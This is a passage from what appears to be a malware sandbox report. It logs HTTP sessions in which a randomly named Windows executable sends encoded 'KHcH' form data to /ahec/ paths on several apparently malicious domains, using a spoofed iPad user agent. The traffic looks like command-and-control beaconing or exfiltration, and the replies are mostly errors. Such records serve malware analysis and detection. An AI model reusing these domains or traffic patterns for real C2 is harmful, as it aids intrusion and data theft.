                                                                          Data Ascii: KHcH=qDdKu90srGSGiP2/CEZ/bqTPL+04qVKsThKKcsV4cJykIPCrZ0lv86L3BsvvPsVzdau7LWhYmPcSxDFyjZwiUoCuXumgD0DKmnzdU30iRhzdwavps/fugkntqg2eJ/1oa0mnmIIPhJtdL6G1JkVQmlUESifRWFmpHZS0jZqzC3Y9HjYj2Q==
                                                                          Dec 2, 2023 18:50:24.491022110 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:24 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          38 | 192.168.2.5 | 49757 | 162.241.252.161 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:27.010592937 CET | 832 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=qDdKu90srGSGkuG/Enx/SqTMVu04g1KoThGKcu5Sd8ikIuSrYxRv/6L3UcvQLsU/dazILU1YmL0SxGpykuctXYCoaOmmH0DKmnzdU3gERgbdxq/psd3p8UnygA2eYP1sa0nXmMAhhPhdL721Jx5TslUGWieGT02mPIafo8+zanVNG20wxpNa5clh+3jIo/gLDTHkfIw=
                                                                          Dec 2, 2023 18:50:27.211474895 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:27 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          39 | 192.168.2.5 | 49758 | 162.241.252.161 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:29.727535963 CET | 1845 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.thecoloringbitch.com
                                                                          Origin: http://www.thecoloringbitch.com
                                                                          Referer: http://www.thecoloringbitch.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:29.926692009 CET  533  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:29 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                                                          40          192.168.2.5  49759        162.241.252.161  80                1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:50:33.175403118 CET  524  OUT  GET /ahec/?Vjk=-N-tntX&KHcH=nB1qtJANgieev8TNIXcafe3NbPYBnXyCXRyPWsB/WMzSWoyZdSlu5bXncPzzIIBEZ/2nP35zxbYs3CtalsMWA76IWuP2FlzTnw== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.thecoloringbitch.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:33.390032053 CET  533  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:33 GMT
                                                                          Server: Apache
                                                                          Content-Length: 315
                                                                          Connection: close
                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          41          192.168.2.5  49760        185.74.252.11   80                1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:50:39.220145941 CET  794  OUT  POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=6nAY1pwJurF3mZVtqhojcS/pFQNd+epjZZwgNA6lWwEmm2L9MDFjsJ3WOonTlAG8QdRNSG+n80O1LXif8wyQQKTvKNWvWX9YaqXLk7UwjLbflgk97Q68d5E8Ll34FFFQhvdI0rKZvlQlXOZM7HX6pr5QaqvAaDmv7FPopRI11KrlrvGfXQ==
                                                                          Dec 2, 2023 18:50:40.391369104 CET  1340  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:38 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"


                                                                          Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                                                          42          192.168.2.5  49761        185.74.252.11   80                1600  C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp  Bytes transferred  Direction  Data
                                                                          Dec 2, 2023 18:50:41.927356005 CET  814  OUT  POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=6nAY1pwJurF3l4ltsG0jey/2ZANdnupvZZ8gNCW1WDgmmTv9NGljrJ3WGIns4QHwQdt/SEqn80y1LWSf9ByPT6TpAdWtJn9YaqXLk7pbjLDflxU9pFG/bJE/CF34UVFMhvdm0qX2vm4lXPpM7T79jr4bHavOShj7/k74sCFqkOGZjaqMQgDEgZDHRQAgZsiFM4QZBrA=
                                                                          Dec 2, 2023 18:50:43.047451019 CET  1340  IN  HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:41 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Data Ascii: 4000<!DOCTYPE html><html lang="ru-RU"><head><meta charset="UTF-8"><link rel="profile" href="https://gmpg.org/xfn/11"><link rel="pingback" href="http://altralogos.com/xmlrpc.php"><script>window.MSInputMethodContext && document.documentMode && document.write('<script src="http://altralogos.com/wp-content/themes/woodmart/js/libs/ie11CustomProperties.min.js"><\/script>');</script><meta name='robots' content='noindex, follow' />... This site is optimized with the Yoast SEO Premium plugin v19.2.1 (Yoast SEO v19.6.1) - https://yoast.com/wordpress/plugins/seo/ --><title> | Altralogos</title><meta property="og:locale" content="ru_RU" /><meta property="og:title" content=" | Altralogos" /><meta property="og:site_name" content="Altralogos" /><script type="application/ld+json" class="yoast-schema-graph">{"
                                                                          Dec 2, 2023 18:50:43.232503891 CET1340INData Raw: 6e 2e 77 64 2d 73 65 63 74 69 6f 6e 2d 73 74 72 65 74 63 68 20 3e 20 2e 65 6c 65 6d 65 6e 74 6f 72 2d 63 6f 6c 75 6d 6e 2d 67 61 70 2d 64 65 66 61 75 6c 74 20 7b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 32 31 32 70 78 3b 0a 09 09 7d 0a 09
                                                                          Data Ascii: n.wd-section-stretch > .elementor-column-gap-default {max-width: 1212px;}.elementor-section.wd-section-stretch > .elementor-column-gap-extended {max-width: 1222px;}.elementor-section.wd-section-stretch > .elementor-column-g


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          43 | 192.168.2.5 | 49762 | 185.74.252.11 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:44.629376888 CET | 1827 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.altralogos.com
                                                                          Origin: http://www.altralogos.com
                                                                          Referer: http://www.altralogos.com/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:46.092053890 CET | 1340 | IN | HTTP/1.1 404 Not Found
                                                                          Date: Sat, 02 Dec 2023 17:50:43 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          Link: <https://altralogos.com/wp-json/>; rel="https://api.w.org/"
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Transfer-Encoding: chunked
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          44 | 192.168.2.5 | 49763 | 185.74.252.11 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:47.331485033 CET | 518 | OUT | GET /ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.altralogos.com
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:50:47.976064920 CET | 547 | IN | HTTP/1.1 301 Moved Permanently
                                                                          Date: Sat, 02 Dec 2023 17:50:46 GMT
                                                                          Server: Apache
                                                                          X-Powered-By: PHP/7.4.33
                                                                          Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                          Cache-Control: no-cache, must-revalidate, max-age=0
                                                                          X-Redirect-By: WordPress
                                                                          Upgrade: h2,h2c
                                                                          Connection: Upgrade, close
                                                                          Location: http://altralogos.com/ahec/?KHcH=3lo42cEGi68x7KhRgTNiezz9KQRWhNcycY0hNiK/Qn4Z+z7fEU9kkqncAr7zuQTFBqkfWFiGtk2IJlit7AKsEfnRPtjbaXErcA==&Vjk=-N-tntX
                                                                          Content-Length: 0
                                                                          Content-Type: text/html; charset=UTF-8


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          45 | 192.168.2.5 | 49764 | 34.120.55.112 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:54.901721954 CET | 782 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=b6dZwGuJuttsODTyADATFS8YXfe9+c/KsiHBeVgv7Mw7Z0MpurtFh0PneYnfllrfWKXkMvnj8U1wNPiEQLvgyZbRlFmvHy7dan9xYd/wkhSF12dUegQIMT5fsBpQsbWzWE/KBunGKchOef5upWqruBslfgjDLrHfwjzNIaDqTAGQjBq6ng==
                                                                          Dec 2, 2023 18:50:55.189815044 CET | 380 | IN | HTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:50:55 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          46 | 192.168.2.5 | 49765 | 34.120.55.112 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:50:57.538683891 CET | 802 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=b6dZwGuJuttsPijyBksTVC8bZ/e938/OsiLBeUVq64c7eRgpvqtFi0PnGomXhlrEWKrsMrnj8VVwNPSER6vhyJbTjFmtDy7dan9xYd7akhKF1FVURi4JGz5cmhpQobW3WE+fBv7oKepOeelupHqqhBsnQAiBNp22yBGFPPuANAOOiUGpgcNJ91IMKGXvRY+VpyksRB4=
                                                                          Dec 2, 2023 18:50:57.831825018 CET | 380 | IN | HTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:50:57 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          47 | 192.168.2.5 | 49766 | 34.120.55.112 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:00.169476986 CET | 1815 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.77moea.top
                                                                          Origin: http://www.77moea.top
                                                                          Referer: http://www.77moea.top/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:00.461985111 CET | 380 | IN | HTTP/1.1 405 Not Allowed
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:51:00 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 157
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx/1.20.2</center></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          48 | 192.168.2.5 | 49767 | 34.120.55.112 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:02.794456959 CET | 514 | OUT | GET /ahec/?Vjk=-N-tntX&KHcH=W415zxONlMY0LROALmBwVywFRuOF9MDUrzPBSWER7JgIGEVSpL5hn1DTAqCrj0fiYOesE/vl81lAGPaeX7agy86ItGv6ERTYYg== HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Host: www.77moea.top
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Dec 2, 2023 18:51:03.085356951 CET | 354 | IN | HTTP/1.1 200 OK
                                                                          Server: nginx/1.20.2
                                                                          Date: Sat, 02 Dec 2023 17:51:02 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 5208
                                                                          Last-Modified: Wed, 11 Oct 2023 10:00:52 GMT
                                                                          Vary: Accept-Encoding
                                                                          ETag: "65267254-1458"
                                                                          Cache-Control: no-cache
                                                                          Accept-Ranges: bytes
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Dec 2, 2023 18:51:03.093022108 CET | 1340 | IN
                                                                          Data Ascii: <!doctype html><html lang="zh"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=0"><script src="https://g.alicdn.com/woodpeckerx/jssdk/wpkReporter.js" crossorigin="true
                                                                          Dec 2, 2023 18:51:03.093049049 CET | 1340 | IN
                                                                          Data Ascii: ar o=function(){for(var n=(window.location.search.substr(1)||"").split("&"),o={},e=0;e<n.length;e++){var r=n[e].split("=");o[r[0]]=r[1]}return function(){return o}}();function e(){var n=window.navigator.userAgent.toLowerCase();return n.indexOf
                                                                          Dec 2, 2023 18:51:03.093064070 CET | 1340 | IN
                                                                          Data Ascii: ent.toLowerCase();return window.ucweb?"android":n.match(/ios/i)||n.match(/ipad/i)||n.match(/iphone/i)?"iphone":n.match(/android/i)||n.match(/apad/i)?"android":window.ucbrowser?"iphone":"unknown"}()&&navigator.sendBeacon?send(s+="&is_beacon=1")
                                                                          Dec 2, 2023 18:51:03.093077898 CET | 1340 | IN
                                                                          Data Ascii: ocument.createElement("script");e.setAttribute("crossorigin","anonymous"),e.setAttribute("src","//image.uc.cn/s/uae/g/01/welfareagency/js/vconsle.js"),$head.insertBefore(e,$head.lastChild)};break}}</script><title></title><script>var fontSize=w
                                                                          Dec 2, 2023 18:51:03.093092918 CET | 118 | IN
                                                                          Data Ascii: ic/archer_index.369a663b08a55d305b97.js"></script></body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          49 | 192.168.2.5 | 49768 | 37.97.254.27 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:08.783616066 CET | 809 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 185
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=0gIjKnK2BJtevHKZCgtS1sMyyVVH0vy66LHt8W/V4WLlF/aQfG2nKBXF9Es9EVY+CdEoTKgcS2HF3K2vsNPx6YLsFnskiMJsZhtZOdDD5myNK8Krm9SIURsvZOltOkzwkGL8UBoVQyz4HWczQMlaRKiRynzw/rH2yJplZzkn575xF0BYPQ==
                                                                          Dec 2, 2023 18:51:08.963202000 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          50 | 192.168.2.5 | 49769 | 37.97.254.27 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:11.489062071 CET | 829 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 205
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
                                                                          User-Agent: Mozilla/5.0 (iPad; CPU OS 8_4 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12H143 Safari/600.1.4
                                                                          Data Ascii: KHcH=0gIjKnK2BJte9USZABtS0MMxrlVH9Py+6LDt8TfF4lvlEa+QY32nLBXFykt3K1ZTCdJVTLMcS2jF3Lqvs+3w7ILiIHsmmMJsZhtZOdHp5mqNKMarnZGLVRsueOltKkz0kGLSUAlyQxb4HUEzQ9lbbKit9Hy+/piI36p+Uwth6rQCNBtLIubPfLsD1dhqp8sP2E0KqWo=
                                                                          Dec 2, 2023 18:51:11.673322916 CET | 242 | IN | HTTP/1.0 403 Forbidden
                                                                          Cache-Control: no-cache
                                                                          Connection: close
                                                                          Content-Type: text/html
                                                                          Data Ascii: <html><body><h1>403 Forbidden</h1>Request forbidden by administrative rules.</body></html>


                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                          51 | 192.168.2.5 | 49770 | 37.97.254.27 | 80 | 1600 | C:\Program Files (x86)\dLeRhwtaQoqFGcffDaFNqRqHSzFuxNdiNwlQivrH\AQhPMwWbqUlSTgiqGOPNvqG.exe
                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                          Dec 2, 2023 18:51:14.188005924 CET | 1842 | OUT | POST /ahec/ HTTP/1.1
                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Host: www.wrautomotive.online
                                                                          Origin: http://www.wrautomotive.online
                                                                          Referer: http://www.wrautomotive.online/ahec/
                                                                          Cache-Control: no-cache
                                                                          Content-Length: 1217
                                                                          Content-Type: application/x-www-form-urlencoded
                                                                          Connection: close
